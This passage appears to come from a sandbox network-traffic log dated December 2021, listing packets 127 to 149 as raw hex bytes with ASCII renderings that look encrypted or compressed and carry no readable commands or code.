5b 8a 58 ae c7 db 04 3a 6d af d4 49 73 50 92 c1 14 4d d4 c4 73 0f eb e8 bd 03 32 53 66 82 ee 11 d8 45 2b bc eb 9c Data Ascii: VvPz;J!6hpr34ZX[?Mi3[}/=4w>r=*W%HKBLO"27 LYvlVs.E`3v9aP5wdE(UiQX$'R[bT^m\R6n:[X:mIsPMs2SfE+
2021-12-15 13:13:49 UTC	127	IN	Data Raw: 62 d6 00 03 fd 43 b5 b2 62 7e 70 57 6e ec 17 1a b4 77 06 25 50 13 10 af 8d 34 72 6e 13 18 63 4f 2d 7d 7f d1 56 bd fb b9 9b d9 7a 7c 33 7f 80 56 91 e8 37 bd a6 e3 30 9b 47 31 a9 4c b6 08 fb ad 29 03 1c c2 e2 88 0b c4 c8 60 4f 39 d5 9a 71 ed c0 e8 91 7a 39 93 0c 03 2b 2f de f7 06 ca 0f 4e 61 b2 59 40 24 dc 32 6d bb 85 fc be c7 60 15 d5 e3 e7 ec fb 32 5c 8b 77 18 2e 0e 46 af 30 a8 2e b4 f0 5e 21 a9 bc e6 bb 93 85 60 1c be 27 64 b1 28 61 6f 39 c8 c5 1c 6c 76 3a 5a d6 04 77 3d cd 1d 4d 98 88 93 fa 36 e2 fd f5 8d ef 9d ba f4 50 8b 93 99 de cd e2 f4 4a 83 4a 86 fe ee 63 31 e6 ee c9 ee 20 4b ce c1 61 fd 4b ed c0 0b 8f ae 33 d2 d2 b6 82 88 f6 dd 49 3f 45 2a 0a 83 a8 7d 5a 58 1d c4 e1 2f bc ea 7b fa 4e 6c d8 9f 22 7f c6 61 46 c0 e5 f2 bc d5 e8 8d a5 9d 6a 44 90 e4 Data Ascii: bCb~pWnw%P4rncO-}Vz\|3V70G1L)`O9qz9+/NaY@$2m`2\w.F0.^!`'d(ao9lv:Zw=M6PJJc1 KaK3I?E*}ZX/{Nl"aFjD
2021-12-15 13:13:49 UTC	128	IN	Data Raw: 5e d8 f9 a9 5a 20 a9 9a b9 13 1a 94 8b 2b 64 83 de f2 8f 6f c6 af 3d b7 b2 fa a1 d3 2b 4b 66 d8 bb 28 05 f5 99 92 26 c9 30 18 8d 97 25 36 6a ec 78 fb 75 d5 50 49 3e 3b 12 d4 b9 7e 1f ed 10 8e 93 57 29 92 1b 23 b3 d9 a6 60 f5 2c 78 bf b6 f3 9f 79 32 c0 97 9a 7b 9e 5e 51 ff b1 4c 96 5f 13 b0 59 48 23 2c 83 c4 89 4c e5 15 3d a5 d2 fd 68 99 7e c6 2a b4 9e 03 a2 b0 97 e3 92 0d 20 b5 31 48 39 f7 07 d1 24 97 88 1a e1 a4 c5 bd fe cb 14 1f 6b 49 cf ce 5e 6c 3b 62 1a fd d5 e6 0b fe 33 d3 ad 1a 85 54 83 37 c2 01 3c 7a ec e7 fc dc 7c fa 3f 27 93 18 af 59 b0 df 4d 7b d3 fd 03 fe 15 a4 ae 76 79 f9 a8 d1 b9 20 fc af 38 a2 6a 93 9d 83 c6 ac 16 5f 7f 4d 7c dc 35 c0 ee f6 84 6a 90 2a 3f f2 a6 13 a1 6d ae b2 63 d4 41 eb 3a 18 ff 47 b4 eb 90 a4 d5 c5 24 9a 6e 44 67 de 4e 23 Data Ascii: ^Z +do=+Kf(&0%6jxuPI>;~W)#`,xy2{^QL_YH#,L=h~* 1H9$kI^l;b3T7<z\|?'YM{vy 8j_M\|5j*?mcA:G$nDgN#
2021-12-15 13:13:49 UTC	129	IN	Data Raw: c9 25 12 09 d5 64 8d fd 7a ec 49 33 03 20 85 c5 79 f6 86 4a a3 e9 f9 9c 41 30 77 b7 09 86 82 2f e8 e4 d8 a3 d9 b1 96 9f 65 17 38 d8 a0 53 9c 73 0b ed 96 c9 2f 25 2f 4e df 42 84 21 2b 5b 01 31 8b d1 ef 23 a2 41 7a c3 80 7d 97 63 df a7 db 81 df 0a a0 a3 d9 09 cb d5 6d 3d 66 b4 e7 ad ba 1c be 58 ad e2 2a 8b 90 ea e1 00 8c 62 5f 65 2b cf a9 8f 7c 06 56 8c 18 07 3e 6f 4f 97 fd 73 e1 e8 5e fe a1 c0 0b f6 9c c5 c0 9b cb 3c a1 36 32 b8 54 17 5e ec 11 3a 45 14 9d f8 e2 b9 f8 0b 27 e8 a1 be 9d 81 f1 26 ad 5c fd db 41 7d 27 e5 4a 22 32 3c d7 1f 82 e0 a6 2d be da d9 2a c7 44 f7 96 c6 73 a8 74 e8 46 c2 1a ba e5 74 a4 91 e1 d4 bb 5c f9 ab 62 1c a8 bb b5 0d e5 75 21 e3 ea 7c 3e 89 d0 41 aa 98 fe bc da 8a 75 41 e1 87 a1 55 55 23 8d 26 d0 be 9a ea 00 34 67 3b 0e a4 89 ca Data Ascii: %dzI3 yJA0w/e8Ss/%/NB!+[1#Az}cm=fXb_e+\|V>oOs^<62T^:E'&\A}'J"2<-DstFt\bu!\|>AuAUU#&4g;
2021-12-15 13:13:49 UTC	130	IN	Data Raw: 25 e8 4b a5 06 2b c1 63 05 03 37 a2 78 ba 27 79 a1 a5 48 18 8b 9a 0a 79 1f 31 51 ff 67 26 93 df 86 fe e9 08 a7 68 62 4e 49 1c b7 be 70 1a 9c b3 dd 93 8b 9a d8 a6 58 63 f5 e3 38 e2 eb 50 f7 77 a6 19 96 79 ce 19 39 b6 a5 6a de f6 96 24 af 5d bb ec 5e 24 dc a6 a6 8c 2d dc 59 05 29 13 65 d7 42 bb 54 4a 76 a3 c6 5b 17 a4 1c b9 47 01 29 c0 49 dd 23 7e 5a 6c 07 fa 83 2f 80 3b c1 35 6a e6 48 89 04 72 c8 5d 58 ca e0 87 77 bd 46 ff e6 6e b2 fa 64 ca e5 4e 11 ab 47 7d f8 d7 c1 d6 86 68 4a b2 dc c5 9b af 5e 5e dc e9 1a 66 0f 5b a0 e7 1b eb 45 cd 33 cb 94 9b 53 7b b8 50 56 fc 1b 5b 72 a8 2b 40 74 ce 21 45 9b 4c 9a ea 1c 72 39 60 e8 c6 cf 6f 5d d3 de 1c ad ac 2d d2 eb 4e 35 96 fb 12 d7 76 cf 6b 62 46 96 49 44 10 98 98 d8 93 86 9a 2f b5 55 9b 53 da 2e c4 72 35 e2 1c 3e Data Ascii: %K+c7x'yHy1Qg&hbNIpXc8Pwy9j$]^$-Y)eBTJv[G)I#~Zl/;5jHr]XwFndNG}hJ^^f[E3S{PV[r+@t!ELr9`o]-N5vkbFID/US.r5>
2021-12-15 13:13:49 UTC	131	IN	Data Raw: 33 cd e9 c6 86 97 71 cb e6 11 64 5d c9 35 17 86 1c 13 3a c1 b1 56 c2 96 d7 0d e1 15 99 6d 9d 39 af e5 dd e6 4b 1d bb d3 1c 59 df ac 33 11 49 d8 f2 9e 63 4a 00 2d 16 87 02 c5 7e c7 6c fc 6b a3 1b 6a ae 22 f5 b6 f4 76 fd 30 de bb 64 10 4b 93 7a a5 bb a8 82 cd a7 07 05 83 f3 7f fc 67 71 51 3d d6 09 29 90 cb 66 6a 9d ac 4d 57 0e cb 7e db 30 e0 05 e8 97 a4 ee 8e b3 b4 36 51 0d 47 50 3f f3 92 85 4b 60 0b 03 34 fa 09 ed e8 7d 44 98 8d 90 5c d8 29 e8 29 0e ef a6 ca b4 5a a6 a7 7e 2d da cb 2e 26 e1 ae 91 b4 94 80 34 ae 60 9a 6f 78 3d 11 07 bb 69 db b1 e3 e4 5e ee e4 5e 3c 22 c3 d0 53 e0 47 c5 1f c7 26 39 db e9 5b ae 41 4c 4e 4b 4e 0b 62 44 de 66 38 22 0b 91 b8 d2 55 56 5e 61 3b 5d 2c 55 e2 9d 19 37 5f 07 0d 66 49 40 8a d5 2f 6e d9 1d f9 44 ca 85 f4 00 5b 42 a6 ac Data Ascii: 3qd]5:Vm9KY3IcJ-~lkj"v0dKzgqQ=)fjMW~06QGP?K`4}D\))Z~-.&4`ox=i^^<"SG&9[ALNKNbDf8"UV^a;],U7_fI@/nD[B
2021-12-15 13:13:49 UTC	133	IN	Data Raw: 94 70 3e 69 92 cf b5 0a 56 7d 6a 8e 73 ed c3 e0 fc d8 7f 7d e7 93 34 c4 40 22 3d bd f1 ff 70 94 79 af ba 5a 10 3e 37 5b d7 07 54 47 f4 90 e7 19 22 6c 8b 7a 8d 75 7e 66 ce 44 62 dc e9 2c d4 21 a9 5e 31 53 20 ca ed 7d cb 6f 43 1f e3 fa cf 42 38 6a 6d 4d cf 0d b4 38 a0 3c 02 ac 7a 70 a4 5c 65 df bf b2 59 64 ef c1 b7 f2 27 6e c4 42 25 39 b3 17 42 d4 9a e5 6b 01 43 47 c2 67 f3 17 8b 79 57 6d 5e 1d 8b 19 88 f6 db 62 d5 1e ab 87 a9 f6 0f 47 73 cd e1 46 0e ab ca c9 c4 4a da 84 8a bb 72 2f f6 f6 2c 02 67 6d 17 8a f7 69 fa 59 50 29 30 94 0b 2f 24 c0 c6 56 7f 57 61 f8 4d ee 70 ca 05 a1 cd 0e 1f f1 dc d1 e6 2d 3a be 7f 16 41 05 de b0 a5 76 2c ad 86 df 40 68 6c ce 39 d2 96 9e 3b 0a 95 78 d1 29 60 17 ab 63 37 ab 54 34 92 0a b8 6c d5 17 d0 2e b9 dd 40 00 4c 76 e1 6a 0a Data Ascii: p>iV}js}4@"=pyZ>7[TG"lzu~fDb,!^1S }oCB8jmM8<zp\eYd'nB%9BkCGgyWm^bGsFJr/,gmiYP)0/$VWaMp-:Av,@hl9;x)`c7T4l.@Lvj
2021-12-15 13:13:49 UTC	134	IN	Data Raw: 46 3d d7 d7 82 13 8b 6f 1c c4 2c 4b 98 18 26 68 05 2c af 9c 4b 36 f1 6d b5 ff 6d 05 64 f0 6e ea ee 81 b6 b1 a8 b3 ab 4f 25 9c 29 2f 63 ee 5f dc 9c 9a c8 95 52 06 71 da 2b 4c 72 7e d1 0e f0 03 a0 27 90 89 da 10 fc 81 66 fb 9e cc ed be 68 94 47 41 55 1e ee db 79 ae 38 7c 22 45 81 ba 75 9a e8 90 63 65 05 cb 65 d7 cd c5 a8 2c c5 6b 92 4a 9a 64 d3 8f 3d 1d 3c 17 84 68 2d 64 6e 8f a4 8a 5a 49 e9 4d d6 52 88 64 5f 5e 11 7e b1 05 fb 44 30 bf 77 7c 39 1a 7d 4e ba 36 0d a1 94 64 c2 d6 6c a5 70 db bb 51 2f 93 f1 f1 b1 fe bc 54 0d 28 42 5e 11 da 15 e3 fb bf 13 39 0d d0 04 e7 88 8e 20 24 bf 66 4a 5c df 06 c0 de c0 8e 63 a3 c8 5f 1d a4 7b 28 1b 0e 9e 63 3c 1f 19 9b 1e 73 3d af 8b f1 6c 67 3f c3 e9 04 9b 14 c6 b3 8e de 1c 0a 07 14 f4 cf b9 1e 7c ee 5a 69 ef af 5d 11 92 Data Ascii: F=o,K&h,K6mmdnO%)/c_Rq+Lr~'fhGAUy8\|"Eucee,kJd=<h-dnZIMRd_^~D0w\|9}N6dlpQ/T(B^9 $fJ\c_{(c<s=lg?\|Zi]
2021-12-15 13:13:49 UTC	135	IN	Data Raw: f8 e1 c6 2e 43 43 16 85 11 ab c2 b4 bc 31 e1 7e 2f 4e 88 b1 d7 16 bc 9b 3d 38 6f bb 8e af a6 e6 77 da 59 3c f0 4f cb 24 06 e0 0d 2a 29 24 3d ec f1 9e b2 6d e7 f4 68 5c a3 67 4e 30 38 49 13 57 eb 9c f9 00 c6 0e 94 15 f4 02 53 3e 34 ff 43 55 91 36 95 29 79 21 48 0f fb 33 56 fe 84 86 e2 26 d1 1d e4 3f db 14 94 56 a1 36 33 6a 9b aa 40 1b 0b d5 12 15 b0 88 2b fe a4 44 3c 1a 27 c3 e0 ff c6 18 22 01 2a a8 af f4 0b 03 75 c6 a5 cc 8a 7a 3c 5a ba dc 3b a1 00 9d 82 2b 79 16 5c d7 0a 65 1b 24 d0 93 92 e3 db ae 87 81 fb 6e a5 58 a0 c3 29 64 07 41 80 8f 0f 84 4f 57 f7 50 fc 23 25 19 ad f8 83 d4 1e 3d 96 b4 9e 28 44 27 fc 5b a3 88 bd 35 36 fc 20 9e fd ed 8e 6e 29 9f 7c 73 1b f2 8f d8 f4 d8 84 86 bc 74 4b ab f2 83 18 4b 5c 95 ff 8c fa fa a7 03 57 74 f6 2a 8f 33 d2 12 34 Data Ascii: .CC1~/N=8owY<O$)$=mh\gN08IWS>4CU6)y!H3V&?V63j@+D<'"uz<Z;+y\e$nX)dAOWP#%=(D'[56 n)\|stKK\Wt*34
2021-12-15 13:13:49 UTC	136	IN	Data Raw: 10 b2 40 30 ad 28 72 f0 db 74 b6 5c cc 58 ff 80 fe 43 d8 d8 3d fe 97 e0 8b 4e 23 43 47 7b fe 58 71 7f 5c 55 c0 26 b7 31 c2 6c 73 2a 02 d8 23 0c 38 22 1d c2 a1 63 eb e6 e7 62 3b 20 0b 61 82 a8 2f db 40 fb 51 71 d2 19 87 36 f0 ee 5e ab 1b 9f 16 2c c3 2c 6e d5 ed a4 d8 89 0f e9 60 84 76 d2 94 a4 ee 2a ad f8 b3 8e eb 89 b0 e9 12 92 68 ab 4c 21 ed 4d bb 4c e0 81 f2 9b 59 14 4f 27 f5 96 f5 37 db a4 88 0c 4a 8f 3a 79 91 c4 86 76 45 4b bd 68 f5 52 c2 62 6f 8e 05 6c 04 5b f9 78 fe a9 e2 42 91 80 27 c0 3c c6 29 21 a3 12 68 bf e3 97 e4 4e 11 29 fd 7d c9 ef 6a 1e e0 6e 04 54 7e 22 0f af f5 6e 45 dd 07 51 ad fe df bd cd 50 0b 96 fc 05 53 bf 86 70 9c 98 a9 62 51 9b ec ad fb 52 5f 5b 9c 9d 07 e8 fd e6 2d 50 20 e7 34 35 bb 52 4b 88 fd 97 c4 de 78 64 10 ad 37 f2 49 ea b3 Data Ascii: @0(rt\XC=N#CG{Xq\U&1ls#8"cb; a/@Qq6^,,n`vhL!MLYO'7J:yvEKhRbol[xB'<)!hN)}jnT~"nEQPSpbQR_[-P 45RKxd7I
2021-12-15 13:13:49 UTC	138	IN	Data Raw: 05 60 08 c4 18 8c c5 39 31 2b 22 cf 00 67 96 e5 31 66 dd 5f 48 4d 47 6f 7d 70 5a fd 34 65 cf 0f 78 93 20 41 15 cc 95 17 b4 6e 3d 9f 85 ad d4 9d 26 89 ec 82 79 36 f4 d1 0d 49 3a 40 dd b6 79 97 e2 fc 60 e6 d6 19 42 d8 d4 21 8d f5 51 ba a3 53 99 37 36 25 b3 3e a1 1f 3a 79 11 f8 09 f9 bf 66 d3 66 26 2b ee 4d 48 c6 dc af e0 e7 0f 84 24 59 1d e0 e7 21 84 c6 73 03 aa f3 4c 33 12 a2 3c a9 c6 5b 1f a5 c5 34 ec 65 47 3a 1a db 1a 84 d5 6d 3e 3c 7f e2 53 f8 dd 5a 9b 92 28 96 ca 56 74 9a 6b f3 e3 06 2f f7 18 71 4c bc 9b 8a b0 a6 9e 41 b4 ca 9d 94 3a f4 f6 3b 95 84 42 d8 d2 71 e0 ab 9a ea 89 f2 be a0 6e 6e e8 38 6e 24 fe d3 4b da 9a 68 8d 44 3d cd d0 8b a4 69 9d 6c de 85 1d 46 c3 0e 48 1a 5b b9 7e 4d 73 fd 13 d8 c5 47 e8 99 bd 3c f4 0f e2 d6 f8 4f b0 b6 c3 e1 7d dd ea Data Ascii: `91+"g1f_HMGo}pZ4ex An=&y6I:@y`B!QS76%>:yff&+MH$Y!sL3<[4eG:m><SZ(Vtk/qLA:;Bqnn8n$KhD=ilFH[~MsG<O}
2021-12-15 13:13:49 UTC	139	IN	Data Raw: b9 52 7a 86 2d ce 98 b9 75 49 4a 0e 68 5c 2f e0 17 32 4d b8 b7 79 7a f5 44 c4 33 e5 ba 1c 91 c6 bc b0 86 2c 1b c0 b6 5b 5c bc 80 f7 3e 60 34 3a f9 4f 0a d2 23 eb b1 83 12 8f a4 10 7f e7 ec 5c 3f 57 55 c6 45 16 41 28 2d 9a 0b 2c 76 4a 86 cb b6 a6 b8 0a 85 76 d3 b2 05 20 fa ea 4d fc 37 c7 ff 9d 03 2f df 62 28 72 fd 24 c1 c2 81 c4 a9 08 ad 4d 04 81 1e e0 86 15 fd 88 4b 52 3f bb 1c bf 44 1b 1f 40 95 d8 9a c0 12 d8 ee 2a 87 c1 ca 1c ef 8f 79 94 76 b9 e9 b7 44 da b5 f1 cd 8c 42 21 48 7b 61 6b e5 56 ef ec 56 a6 26 3b 33 f9 12 92 fb 29 5c ef d7 f5 ee 7b 67 7a a8 28 63 b8 31 11 bb c9 2e 44 81 16 7d 09 80 f1 41 8d 3c fa 99 d8 4e cc 53 37 2f d6 c6 f2 6e 91 49 da c0 12 e3 71 90 8a b8 75 ef 82 50 40 a1 aa 15 7f 67 29 20 11 a2 d2 10 3b 28 74 11 bf c2 67 2e ed 6f bc 99 Data Ascii: Rz-uIJh\/2MyzD3,[\>`4:O#\?WUEA(-,vJv M7/b(r$MKR?D@*yvDB!H{akVV&;3)\{gz(c1.D}A<NS7/nIquP@g) ;(tg.o
2021-12-15 13:13:49 UTC	140	IN	Data Raw: 2f 04 6c 13 72 cd e5 8a 6a 56 bc 7a 64 57 dd 37 17 08 80 b9 07 d7 02 22 06 45 d3 aa 83 48 da ea 52 01 69 06 1d ca 87 77 19 c0 08 6f aa ef dd 47 4a dc ae f3 0f 08 7d f3 eb 9d 3f a7 51 c7 49 f3 41 0a f6 af b7 06 5a d0 ce 48 40 3f 5e 59 e2 c9 b4 64 a1 87 6a ba 8d 45 61 9a f9 d9 64 5a bf 33 d2 9a da 39 72 8d e7 21 90 66 ca 33 77 f3 21 71 4c 61 ec a3 24 4b 68 b2 e0 a5 34 19 ae 04 1f f5 6f aa 31 92 e8 4f a2 a8 3b 41 a4 8e f9 84 f9 54 1d fe fc fa 57 a7 36 a1 8c d8 d0 a3 a0 ac da 21 7e 37 d9 33 ab 17 8f 18 ed 4d 4e e9 5d b8 a9 5f 42 38 b1 5e 9c ae 59 ce ea 47 ff 0b 23 c9 cf 6d 45 1f 8d ce 61 53 bf 64 1a 43 6b 53 65 6c 0c 6f 41 1d 39 fe 06 5b de 26 09 a4 98 bb ea 14 0b 54 66 2b 48 1f 38 4a 41 ba 6d af 3b 04 50 45 13 c4 2c 23 a9 96 08 c5 52 bb f2 81 2b 1a 52 b1 58 Data Ascii: /lrjVzdW7"EHRiwoGJ}?QIAZH@?^YdjEadZ39r!f3w!qLa$Kh4o1O;ATW6!~73MN]_B8^YG#mEaSdCkSeloA9[&Tf+H8JAm;PE,#R+RX
2021-12-15 13:13:49 UTC	141	IN	Data Raw: de 23 bc 69 8c 53 50 ca 29 f0 e6 fc 46 58 2f 9e 6d e3 31 74 f7 3d 20 dc 23 77 39 b1 3c 46 06 ba 33 25 a3 f1 00 7c de 33 f4 d4 9a a6 38 04 86 54 b3 2c 4f f1 f2 8c f8 b9 ee 9b 31 d7 41 8c 22 ba a4 bb 40 92 15 46 fd 80 c5 0f 12 bf 3b 50 a1 f8 db 6b 63 9f 11 88 55 24 58 2d e1 10 7f 27 33 26 fe c7 fe a3 20 14 29 f5 e8 30 46 6b 96 e8 79 0e 76 51 9d 8e 48 a0 33 60 97 0d 49 e0 c6 f7 7f 68 64 1a 24 1e e8 30 ca 89 0c d4 e6 c9 96 f5 c9 44 88 4c 88 37 36 ca 7a 09 1a ab 11 d8 df b0 a4 d0 89 12 0f 10 0b 62 77 9c a2 29 70 fd c2 e1 6f 08 70 85 53 47 50 19 92 51 40 a8 fc ff f2 30 6e 5a eb 11 4a 84 2c ba 27 b8 b4 72 7b 65 04 55 4e e8 57 8e 27 f6 72 c8 f3 5d c2 9e 18 e0 4e 9f ac 8f 4c 86 90 52 d6 87 aa d3 b6 56 b4 6b 72 16 a7 31 6d 8c 73 d0 cf fd 5d 4e d6 38 c9 dc ff 66 99 Data Ascii: #iSP)FX/m1t= #w9<F3%\|38T,O1A"@F;PkcU$X-'3& )0FkyvQH3`Ihd$0DL76zbw)popSGPQ@0nZJ,'r{eUNW'r]NLRVkr1ms]N8f
2021-12-15 13:13:49 UTC	143	IN	Data Raw: e0 1a d3 b2 38 04 4a 7c 15 54 bc 6d c8 eb 47 8f 98 6b 22 ec 0c a6 b8 2f 1a a7 c6 7f e3 25 fb e9 93 f2 52 20 02 7a bd 98 2c 68 98 36 92 61 4b ae f8 21 c4 ef 9e a5 65 bf 9c 78 a2 9f f9 6a fb 02 e7 f5 e2 13 20 28 01 4b f4 d4 cf aa c1 9d 94 c1 13 f9 08 ed 9e 5f 32 cd 39 ba d6 ea fc bf 62 ce aa 7b ce d3 11 6b 41 9f 4c fb 6f dc 83 64 4a ec 9c b7 45 34 ce fb 4c 2d f4 4d ed c6 71 ed 39 cd ed b5 76 e8 61 bb c3 57 23 e2 31 19 78 12 4f ca 23 e2 46 ba 52 df ce 5c a4 94 50 f6 9b f2 1a 5e eb ca 28 ad a2 6f 2c d5 34 64 f1 0f fd 9e 69 48 6a 45 6b 43 bd e9 14 2a 53 1b 5e c1 c4 92 a6 2a 7d aa 09 e2 f7 9e 37 a7 8a 9d d7 ee 37 00 db 09 20 86 c4 dc 9e e9 e2 ed f5 0a 3f 8d ab 6e 83 8d 36 d7 16 51 70 df b9 4d 61 38 e0 fd 5a 1d a0 d3 db 0b f3 11 1b 27 61 19 55 5e ab c1 07 01 d7 Data Ascii: 8J\|TmGk"/%R z,h6aK!exj (K_29b{kALodJE4L-Mq9vaW#1xO#FR\P^(o,4diHjEkCS^}77 ?n6QpMa8Z'aU^
2021-12-15 13:13:49 UTC	144	IN	Data Raw: 16 85 30 a9 51 d0 93 16 6a 27 22 a6 52 5c 11 20 bb d8 0c 4b d3 ca 85 d9 5f 3a 10 a3 02 b6 55 ca 1d 20 78 6c f5 62 72 c0 d9 a9 55 58 a7 36 d4 87 e2 16 ed bd 26 3c ca 1d 58 6e d2 cb c9 26 33 f1 70 97 58 35 0c f2 62 01 03 51 9b a3 05 99 39 3e ff 4b 17 be 58 0c 7f e8 25 a0 13 a1 e3 cd 29 8d 2e a3 ee 7c a6 1f 6b a0 17 09 98 14 a0 b1 03 42 13 f3 df ac f7 44 5c cb bd 2f 48 f8 72 54 02 8d ac dd 1f 99 9c 31 80 eb a7 7a 9a 95 15 ae 5b 23 ef a9 47 89 41 af ff 61 9c ac 57 df f3 8d 0a 7c d1 62 bf bd 9a a0 65 d3 34 26 74 f9 d2 89 13 9b 2b 31 7b e4 be dd 3c c1 97 f8 7b 99 0a 88 06 1c 5c d0 6b d3 91 3a c4 b8 90 14 03 da 74 d6 f9 49 f2 d8 4f 53 87 4f 3f 32 1d 47 5a 4d f3 96 19 ba 69 28 30 51 b1 16 ec 4b 9c 22 a5 d2 b6 99 ea ca 10 b8 c3 58 9d 83 95 7c 44 d1 48 b3 bc 80 bc Data Ascii: 0Qj'"R\ K_:U xlbrUX6&<Xn&3pX5bQ9>KX%).\|kBD\/HrT1z[#GAaW\|be4&t+1{<{\k:tIOSO?2GZMi(0QK"X\|DH
2021-12-15 13:13:49 UTC	145	IN	Data Raw: 61 59 bb 92 4c 71 c2 fc 17 ea c5 67 7d de a4 9e 0d 6d a5 8d 51 b6 71 6c 3a 5d 42 ba 36 0e 55 be 0d a5 2b c0 1c d8 84 9a 3b 1f 96 2f 33 93 46 03 6e b2 a0 e8 65 26 9a 8d 7f c5 56 ad 5d 3b 55 9b c5 91 6f 80 92 f2 82 71 54 74 33 4b b8 e5 17 fa 3e ea f4 90 64 0a c7 67 91 27 89 e1 f1 28 a6 05 8a ea fa 75 01 e4 b1 ad a8 62 a4 79 80 16 9b d1 51 50 15 28 7c 9f 20 b2 c0 98 d5 5d f2 a3 e8 9e a8 53 e7 3a a6 12 28 e7 98 47 4a 6c a1 52 23 3f e9 72 69 12 70 31 eb e9 4d f9 f1 1a 79 36 c7 cc 2b 1e 47 29 f3 a9 4f ad be 5a 9f 95 20 f7 6f 0a c1 87 d1 47 d9 c9 de 81 11 6d 84 5b 60 ba f9 66 54 83 81 a6 89 be 7c 5e 40 75 13 54 23 af aa 4d b5 1a b4 0e 43 54 7e 46 19 a7 38 4e bd f6 2b 1e 13 ec 03 6f e7 a8 d4 51 90 ed 2e 8c 19 cf 07 b4 9e b0 3f f6 0a 8b 49 a0 0f 69 cb fd 2f 7d b5 Data Ascii: aYLqg}mQql:]B6U+;/3Fne&V];UoqTt3K>dg'(ubyQP(\| ]S:(GJlR#?rip1My6+G)OZ oGm[`fT\|^@uT#MCT~F8N+oQ.?Ii/}
2021-12-15 13:13:49 UTC	146	IN	Data Raw: f1 6e 03 b9 31 6a a4 e8 e7 b6 5b de 9a c5 ff 34 60 91 67 42 77 b0 bf 0b ff aa 59 00 2a d3 92 69 3c 91 72 51 c6 bb 58 9a 8c e2 ac 41 88 3b ad d1 53 7c ba c6 ef bd 8f d8 40 a8 bf eb 17 87 11 4a 6f b1 02 47 77 ee b1 e8 e1 ee fc 17 c2 ff 1a e7 04 91 36 2b 84 12 ac f7 48 01 5d fa 04 e9 23 1e cc d2 0f f2 31 4d 7c 3e ab c3 ba 63 6d 2a a6 3a 69 8b 33 c8 56 f3 85 40 55 6d 1f a1 d4 a0 a8 0c 0e 97 cd 31 16 4b a7 e9 b5 50 5d f3 48 f9 3a c2 97 47 de 1f d7 64 ae 38 c5 a3 ad 3b 28 e2 c6 ef 80 3b 79 fe 97 5b 0b d0 16 b5 3e d5 37 13 9c e6 32 8b d1 c9 62 ef af ee e5 4d 8d ca 77 18 a5 70 e6 99 8d 37 04 5b 31 98 72 47 8f bc 8c b2 77 f8 b7 9d 31 04 58 bb 96 d7 6a 6f 19 4e d7 75 d3 52 b7 26 66 6b 50 3d 40 74 1c f4 18 fd 0b 2e 67 32 d8 bb dc 97 b7 95 32 40 33 d0 4b 6b c9 5c 12 Data Ascii: n1j[4`gBwYi<rQXA;S\|@JoGw6+H]#1M\|>cm:i3V@Um1KP]H:Gd8;(;y[>72bMwp7[1rGw1XjoNuR&fkP=@t.g22@3Kk\
2021-12-15 13:13:49 UTC	147	IN	Data Raw: fa 6f c4 b2 9b 5d ad 5c 1a 77 09 02 1e b4 89 a5 0a dd 09 0f 37 6c e6 81 d6 e0 fc 17 fb 37 90 35 94 65 29 c8 98 03 b3 e2 7d b4 ab 68 1e a5 3e 88 6e 09 79 2f e2 fa 09 f4 77 4b 52 f8 13 dc d6 cc 31 56 a7 0b f3 48 56 00 66 9c 6a 16 2d 28 b8 61 74 0f e4 5b 9b 14 8b 64 40 d4 4b 67 46 c6 0a 89 f5 a0 cd 3d 76 db 89 27 40 e1 f9 b4 bd 33 f5 57 80 b3 ca d8 7d 4e 3a e0 6a 19 ae 74 22 c3 da b1 91 01 66 64 b8 8e c3 4e 76 da 5e 2d 36 78 e1 6a b4 4c ae b2 bc f4 d1 7e da dc 44 b1 6e e2 e6 2a 30 b8 c9 45 07 d3 a0 71 9b 2f 5f 40 0b d4 0d 93 d3 9d 46 89 f4 61 a8 a8 db f8 fe 1c ac 9c 36 50 4e 60 f9 0b bc ad 63 b2 b7 80 72 b8 22 f0 7a ae 6f ec 5e ed b9 8e 3d f7 8d 4d 39 72 d3 73 9a 6b 0e 2f 55 66 5e 05 75 8f 6b a3 c6 13 20 a7 7c de d3 d9 a8 30 af 6d 88 53 01 fa 94 3c 68 04 99 Data Ascii: o]\w7l75e)}h>ny/wKR1VHVfj-(at[d@KgF=v'@3W}N:jt"fdNv^-6xjL~Dn*0Eq/_@Fa6PN`cr"zo^=M9rsk/Uf^uk \|0mS<h
2021-12-15 13:13:49 UTC	149	IN	Data Raw: 33 92 b4 61 17 38 3f 4f 9c 6f e7 66 1d 8b d0 bf 2d 1c dd ec bc fe 6a 54 4e 12 d8 2e dd c8 5f 4b 63 b3 ec f9 6c a7 b4 0d f5 9d 89 f6 25 70 33 f8 66 3f 7f 62 31 65 5a 2f e9 54 6e 80 fe 90 90 83 1d da dc 61 76 f8 88 3d 7c f3 fb 3c 02 87 d1 58 0f 45 32 24 c4 66 96 23 f0 92 35 61 6c 74 02 1f 2a 74 2f 3e 01 d8 e0 13 d7 0d b1 ce 42 50 ca ea c7 30 0e e8 1d ca 05 f2 58 92 54 15 f3 be 43 7c 7c 51 81 f9 7e 60 bf 78 60 29 31 14 7c 22 65 49 c2 9d 5d bf c2 db bf 08 ac fb e2 2d 8e e4 0b be fa 8e 50 b9 4d 0f c4 ab 7b c1 d3 b8 51 f1 a1 e4 08 66 f2 9d 83 a8 e5 2f 0d 78 fb 2b a2 3f 6d 2b c7 30 55 89 3e 4c bf 55 71 24 e7 fa 41 28 aa 6a da f8 ef e8 cb 46 0b 3a 1a 61 cd d7 09 af 9f 37 f6 27 11 1c b2 a4 3a c6 47 1c aa b7 90 0c ac f5 7f 02 86 8e c9 88 d8 dd 77 f4 11 1b 1f c7 2a Data Ascii: 3a8?Oof-jTN._Kcl%p3f?b1eZ/Tnav=\|<XE2$f#5altt/>BP0XTC\|\|Q~`x`)1\|"eI]-PM{Qf/x+?m+0U>LUq$A(jF:a7':Gw
